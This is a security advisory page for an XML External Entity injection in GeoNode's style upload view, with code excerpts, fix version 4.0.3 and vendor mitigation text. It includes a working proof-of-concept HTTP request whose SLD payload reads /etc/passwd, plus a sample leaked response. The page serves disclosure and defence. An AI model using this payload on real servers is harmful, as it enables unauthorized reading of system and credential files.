GHSA-mcmc-c59m-pqq8
MEDIUMGeoServer style upload functionality vulnerable to XML External Entity (XXE) injection
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
geonodeReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.
Details
GeoNode's GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159
@login_required
def dataset_style_upload(request, layername):
def respond(*args, **kw):
kw['content_type'] = 'text/html'
return json_response(*args, **kw)
...
sld = request.FILES['sld'].read() # 1
sld_name = None
try:
# Check SLD is valid
...
sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
except Exception as e:
respond(errors=f"The uploaded SLD file is not valid XML: {e}")
name = data.get('name') or sld_name
set_dataset_style(layer, data.get('title') or name, sld)
return respond(
body={
'success': True,
'style': data.get('title') or name, # 3
'updated': data['update']})
dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234
def extract_name_from_sld(gs_catalog, sld, sld_file=None):
try:
if sld:
if isfile(sld):
with open(sld, "rb") as sld_file:
sld = sld_file.read() # 1
if isinstance(sld, str):
sld = sld.encode('utf-8')
dom = etree.XML(sld) # 2
...
named_dataset = dom.findall(
"{http://www.opengis.net/sld}NamedLayer")
el = None
if named_dataset and len(named_dataset) > 0:
user_style = named_dataset[0].findall("{http://www.opengis.net/sld}UserStyle")
if user_style and len(user_style) > 0:
el = user_style[0].findall("{http://www.opengis.net/sld}Name") # 3
...
return el[0].text # 4
extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.
PoC
- Create a guest/non-privileged account and log in.
- Upload a dataset through
/catalogue/#/upload/datasetwhose name we will be referencing as<DATASET_NAME>. - Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of
/etc/passwd:
POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="layerid"
1
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="http://www.opengis.net/sld">
<NamedLayer>
<UserStyle>
<Name>&ent;</Name>
</UserStyle>
</NamedLayer>
</foo>
------WebKitFormBoundaryfoo--
Sample response:
HTTP/1.1 200 OK
Server: nginx/1.23.2
...
{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}
Impact
This issue may lead to authenticated Arbitrary File Read.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | geonode | all versions | 4.0.3 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for geonode. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update geonode to 4.0.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-mcmc-c59m-pqq8 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-mcmc-c59m-pqq8 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-mcmc-c59m-pqq8. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-mcmc-c59m-pqq8 in your dependencies?
O3 detects GHSA-mcmc-c59m-pqq8 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.